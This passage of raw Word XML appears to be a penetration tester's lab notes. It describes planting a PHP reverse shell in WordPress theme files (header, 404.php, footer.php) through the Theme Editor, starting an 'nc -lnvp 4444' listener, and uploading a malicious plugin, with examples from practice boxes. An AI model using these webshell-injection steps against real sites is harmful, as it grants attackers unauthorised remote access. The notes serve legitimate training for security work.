        <w:t xml:space="preserve">. Select the Header in right side. Here we can see a php code. We are going to change this code so that we would get a reverse-shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4338638" cy="4127809"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212" name="image220.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image220.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId968"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4338638" cy="4127809"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In our terminal, go to "cd /usr/share/webshells/php". Select the php-reverse-shell.php by cat command to get the PHP code, so we will paste that into the wordpress header (another box also used index.php, the main index template, to inject the PHP shell. It was </w:t>
      </w:r>
      <w:hyperlink r:id="rId969">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BTRSys2.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the code and paste it to the php header in the website (try leaving the PHP signature at the top of the code. And if there is an ending tag like ?&gt; then keep it)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4567238" cy="4050419"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="121" name="image120.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image120.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId970"/>
                    <a:srcRect b="0" l="0" r="39102" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4567238" cy="4050419"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try leaving the PHP signature at the top of the code. And if there is an ending tag like ?&gt; then keep it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the IP to our IP and the port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for getting reverse shell and click upload or "update file"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1879600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="564" name="image551.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image551.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97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2D68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lnvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Refresh the wordpress site to get the connection in terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, it's possible that this revereshell only gets you into the www-data account, and not the admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To privilege escalate, look at the "How to privilege escalate in Wordpress after getting terminal" section below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another box that requires a reverse shell from admin account of WordPress is </w:t>
      </w:r>
      <w:hyperlink r:id="rId972">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BTRSys2.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D70">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7ud4l95m81pg" w:id="399"/>
      <w:bookmarkEnd w:id="399"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell using "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Theme Editor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">404.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I don't know if </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin Privileges </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are necessary, but in the Shenzi PG Practice, we did have them</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D74">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId973">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(a windows machine), they recommended that we use the 404.php page instead of something like header.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Theme Editor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1663756" cy="3010607"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId974"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1663756" cy="3010607"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to 404.template and delete everything and replace it with a PHP reverse shell and then update page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access the page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># You can see the sytax here if you have ever Bruteforced a WordPress site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Knowing this structure is worthwhile. It will come up again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># http://$IP/WP-Root-Install/themes/theme-year-name/404.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.208.55/shenzi/themes/twentytwenty/404.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="641"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Specific one used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId975">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Shenzi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice writeup, they used footer.php instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D82">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId976">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writeup, they edited the Plugin instead</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D85">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yaaql5aykln6" w:id="400"/>
      <w:bookmarkEnd w:id="400"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell with Admin Privileges using "Add new" button for plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was also done in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for 172.16.xxx.7. I didn't do it myself, but someone else did. They edited the MySQL database to set new password for Admin, and then after logging in, they added malicious plugin to get a reverse shell. </w:t>
      </w:r>
    </w:p>
